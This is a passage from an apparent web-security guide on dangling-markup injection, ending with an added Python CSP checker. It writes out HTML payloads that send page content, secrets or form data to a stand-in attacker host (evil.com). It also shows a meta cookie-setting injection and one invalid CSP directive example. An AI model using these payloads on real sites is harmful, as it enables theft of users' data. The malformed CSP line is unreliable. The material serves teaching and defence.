`<img src='http://evil.com/log.cgi?`: when the page is loaded, the victim will send you all the code between the injected img tag and the next single quote inside the code. If a secret is somehow located in that chunk, you will steal it (you can do the same thing using a double quote; take a look at which one could be more interesting to use).
If the `<img>` tag is forbidden (due to CSP, for example), you can also use `<meta http-equiv="refresh" content="4; URL='http://evil.com/log.cgi?`.
You can also use `@import` (it will send all the code until it finds a `;`).
Another option is the `<base` tag. All the information will be sent until the quote is closed, but it requires some user interaction (the user must click on some link, because the base tag will have changed the domain pointed to by the link). A later form with a relative action (for example `<form action='update_profile.php'>`) will send the data to the malicious domain.
`<form action='http://evil.com/log_steal'>`: this will overwrite the next form header, and all the data from the form will be sent to the attacker.
You can also use the `<option>` tag. All the data until a closing `</option>` is found will be sent.
The `target` attribute inside the `<base>` tag will contain HTML content until the next single quote. This means that the value of `window.name`, if the link is clicked, is going to be all that HTML content. Therefore, as you control the page the victim lands on by clicking the link, you can read that `window.name` and exfiltrate the data.
You can use `meta http-equiv` to perform several actions, like setting a cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">`, or performing a redirect (in 5s in this case): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`.
For example, `Content-Security-Policy: default-src 'self';`, or `Content-Security-Policy: http-equiv 'self';`.
This requires enabling `chrome://flags/#enable-portals`, or it won't work.
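As an added defensive check that is not part of the original page, the function below takes a Content-Security-Policy header value and reports which of the vectors listed above it still leaves open. It assumes the policy is supplied as the raw header string and encodes the standard directive fallbacks: `img-src` and `style-src` inherit from `default-src`, while `base-uri` and `form-action` do not, and no shipped CSP directive governs a `<meta http-equiv="refresh">` navigation.

```python
"""Report which dangling-markup exfiltration vectors a CSP header still allows.
Added example, not code from the original page; input is the header value."""
from typing import Dict, List, Optional, Tuple

# Each vector -> (governing CSP directive, whether it inherits from default-src).
# base-uri and form-action never fall back to default-src; a <meta refresh>
# navigation is not governed by any shipped CSP directive, so it is always open.
VECTORS: Dict[str, Tuple[Optional[str], bool]] = {
    "img src": ("img-src", True),
    "@import": ("style-src", True),
    "base href/target": ("base-uri", False),
    "form action": ("form-action", False),
    "meta refresh": (None, False),
}

# Source expressions that would let a request reach an arbitrary attacker host.
OPEN_SOURCES = {"*", "http:", "https:"}


def parse_csp(header: str) -> Dict[str, List[str]]:
    """Parse 'dir src src; dir src' into {directive: [sources]} (lower-cased)."""
    policy: Dict[str, List[str]] = {}
    for directive in header.split(";"):
        parts = directive.split()
        if parts:
            policy[parts[0].lower()] = [p.lower() for p in parts[1:]]
    return policy


def allows_any_host(sources: List[str]) -> bool:
    """True if the source list does not pin requests to specific hosts."""
    return any(src in OPEN_SOURCES for src in sources)


def open_vectors(header: str) -> List[str]:
    """Return the vectors from the page that `header` does not restrict."""
    policy = parse_csp(header)
    left_open: List[str] = []
    for vector, (directive, inherits) in VECTORS.items():
        if directive is None:  # nothing in CSP controls this vector
            left_open.append(vector)
            continue
        sources = policy.get(directive)
        if sources is None and inherits:
            sources = policy.get("default-src")
        if sources is None or allows_any_host(sources):
            left_open.append(vector)
    return left_open


if __name__ == "__main__":
    for csp in ("default-src 'self'",
                "default-src 'self'; base-uri 'none'; form-action 'self'"):
        print(f"{csp!r} -> {open_vectors(csp)}")
```

A policy of only `default-src 'self'` still leaves the base and form vectors open, which is the practical caveat: `base-uri` and `form-action` must be set explicitly.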